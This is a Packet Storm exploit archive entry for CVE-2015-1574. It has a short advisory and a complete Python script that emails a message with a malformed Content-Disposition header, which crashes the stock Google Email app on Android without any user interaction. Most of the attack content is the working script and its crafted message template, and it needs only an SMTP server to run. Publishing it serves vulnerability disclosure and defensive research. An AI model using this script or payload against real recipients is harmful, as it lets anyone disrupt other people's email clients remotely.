exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Email 4.4.2.0200 Denial Of Service

Google Email 4.4.2.0200 Denial Of Service
Posted Feb 13, 2015
Authored by Hector Marco

A bug in the stock Google email application version 4.4.2.0200 has been found. An attacker can remotely perform an denial of service attack by sending a specially crafted email. No interaction from the user is needed to produce the crash just receive the malicious email.

tags | exploit, denial of service
advisories | CVE-2015-1574
SHA-256 | ac7559e1e73b67d06c92b883f14f41cbf66238ec15aa4ca1bdae29c219ef9c78

Google Email 4.4.2.0200 Denial Of Service

Change Mirror Download
Summary:

A bug in the stock Google email application version 4.4.2.0200 has been
found. An attacker can remotely perform an Denial Of Service attack by
sending a specially crafted email. No interaction from the user is
needed to produce the crash just receive the malicious email.

The CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a
Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer
versions 4.2.2.0400 are not affected.


Details and proof of concept exploit at:
http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html



Regards,
Hector Marco.
http://hmarco.org


----------------
Exploit crash_Android_Google_email_4.2.2.0200.py:

#!/usr/bin/python

'''
* $FILE: crash_Android_Google_email_4.2.2.0200.py
*
* $VERSION$
*
* Authors: Hector Marco <hecmargi@upv.es>
* Ismael Ripoll <iripoll@disca.upv.es>
*
* Date: Released 07 Jan 2015
*
* Attack details: http://hmarco.org
*
* $LICENSE:
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
'''

import smtplib
from smtplib import SMTPException
import sys
import getopt

#### START CONFIGURE #####
smtpServer = "" # set an appropriate SMTP server
smtpServerPort = 25 # SMTP port, default 25
#### END CONFIGURE #####

sender = ''
receivers = []

def usage():
print '\n$ %s -s sender@email.com -r receiver@email.com\n' % sys.argv[0]
sys.exit(2)

def smtpNotConfigured():
print '\n[-] Error: Edit this script and set a SMTP server to send emails\n'
sys.exit(2)

def printHeader():
print "\nEmail Android Google 4.2.2.0200 crasher"
print "======================================="
print "Author: Hector Marco <hmarco@hmarco.org>"
print "Website: http://hmarco.org"

def main(argv):
global sender
global receivers
try:
opts, args = getopt.getopt(argv,"hs:r:",["s=","r="])
if len(sys.argv) == 1:
usage()
except getopt.GetoptError:
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-s", "--sender"):
sender = arg
elif opt in ("-r", "--receiver"):
receivers.append(arg)


if __name__ == "__main__":

printHeader()

if len(smtpServer) == 0:
smtpNotConfigured()

main(sys.argv[1:])

message = "From: Sender <%s>\n" % sender
message += "To: Receiver <%s>\n" % receivers[0]
message += """Subject: Crash test
Content-Type: text/plain
Content-Transfer-Encoding: 8BIT
Content-Disposition: ;

"""

print "\n[+] Sending crafted message to: %s" % receivers[0]

try:
smtpObj = smtplib.SMTP(smtpServer, int(smtpServerPort));
smtpObj.sendmail(sender, receivers, message)
print "[+] Malicious email successfully sent."
except SMTPException:
print "[-] Error: unable to send the email. Invalid SMTP server ???"
sys.exit(2)



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close